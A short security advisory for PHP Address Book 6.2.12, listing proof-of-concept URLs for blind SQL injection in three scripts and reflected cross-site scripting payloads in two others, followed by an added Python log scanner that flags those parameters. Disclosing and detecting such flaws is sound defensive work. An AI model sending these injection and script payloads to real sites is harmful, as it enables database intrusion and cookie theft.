PHP Address Book 6.2.12 Multiple security vulnerabilities

==================
PoC-Exploit
==================
// (Blind) SQL-Injection
http://[target]/addressbook/edit.php?id=[sql-injection]
http://[target]/addressbook/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
http://[target]/addressbook/vcard.php?id=[sql-injection]
// XSS
http://[target]/addressbook/preferences.php?from='"</script><script>alert(document.cookie)</script>
http://[target]/addressbook/index.php?group='"</script><script>alert(document.cookie)</script>

Thanks to Stefan Schurtz
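A log check for the scripts and parameters listed above, added here as a defensive example; it is not part of the original post or of PHP Address Book. It assumes Apache-style access-log lines and that `id` and `to_group` are meant to be integers, and the log lines in it are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Scripts and parameters named in the advisory.
# Assumption: id and to_group should only ever carry integers.
NUMERIC = {"edit.php": ["id"], "vcard.php": ["id"], "group.php": ["to_group"]}
NO_MARKUP = {"preferences.php": ["from"], "index.php": ["group"]}
INTEGER = re.compile(r"[0-9]+")
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2012:10:00:00 +0000] "GET /addressbook/edit.php?id=42 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2012:10:00:05 +0000] "GET /addressbook/vcard.php?id=42%27 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2012:10:00:09 +0000] "GET /addressbook/group.php?add=Add+to&group=1&selected%5b%5d=132&to_group=x HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2012:10:00:12 +0000] "GET /addressbook/index.php?group=%3Cb%3E HTTP/1.1" 200 512',
]

def check_request(target):
    """Return (script, parameter, reason) findings for one request target."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for name in NUMERIC.get(script, []):
        for value in params.get(name, []):
            if not INTEGER.fullmatch(value):
                findings.append((script, name, "non-integer value"))
    for name in NO_MARKUP.get(script, []):
        for value in params.get(name, []):
            if MARKUP.search(value):
                findings.append((script, name, "markup characters"))
    return findings

def scan(lines):
    """Yield (line_number, finding) for each suspicious access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for finding in check_request(match.group(1)):
                yield number, finding

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allow-list rules (integer-only `id` and `to_group`, no markup in `from` and `group`) are what server-side input validation for these scripts would enforce, alongside parameterized queries and output encoding.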
